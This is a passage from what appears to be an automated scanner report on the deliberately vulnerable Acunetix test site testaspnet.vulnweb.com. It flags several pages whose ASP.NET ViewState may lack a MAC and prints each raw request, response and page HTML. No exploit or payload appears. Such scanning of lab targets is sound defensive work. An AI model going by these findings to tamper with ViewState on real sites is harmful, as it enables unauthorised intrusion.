          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        4. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        5. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        6. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        7. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
